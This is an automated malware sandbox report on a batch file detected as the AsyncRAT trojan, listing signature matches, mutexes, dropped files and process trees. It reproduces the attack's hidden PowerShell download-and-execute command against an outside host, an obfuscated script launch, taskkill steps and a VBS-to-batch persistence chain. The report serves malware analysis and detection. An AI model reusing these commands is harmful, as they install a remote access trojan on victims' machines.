Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; matched rule: Windows_Trojan_Asyncrat_11a11ba1 (reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04)
                      Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25703985aa8.4.raw.unpack, c49e11983285d4ab2e059050de6df5a41.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                      Source: 19.2.powershell.exe.2576eee0000.8.raw.unpack, c49e11983285d4ab2e059050de6df5a41.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, jlsfKWsjaVv.cs | Base64 encoded string: [long base64 strings omitted]
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, jlsfKWsjaVv.cs | Base64 encoded string: [long base64 strings omitted]
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, uZZaicMPQoeTt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.powershell.exe.25702485170.7.raw.unpack, uZZaicMPQoeTt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, uZZaicMPQoeTt.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, uZZaicMPQoeTt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.expl.evad.winBAT@38/13@5/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\AXAGFIIEZBBS.bat
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acrgl1pt.tjp.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() Write-Output $byteOutArray }}[byte[]] $TZPFISFK = VHPDGARDLG( [embedded gzip byte array omitted]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regbrowsers.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_compiler.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AppLaunch.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "jsc.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSBuild.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegAsm.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cvtres.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegSvcs.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: taskkill.exe, 00000009.00000003.1569346683.000001E5A3019000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000009.00000003.1569577646.000001E5A3019000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")T;.CMDA
Source: taskkill.exe, 00000009.00000002.1570148616.000001E5A3019000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")T;.CMD
Source: taskkill.exe, 00000005.00000003.1560984895.000002167F7EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")es;C:\Prog;
Source: taskkill.exe, 00000005.00000003.1561090941.000002167F7EA000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000005.00000002.1561439790.000002167F7EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")es;C:\Prog
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
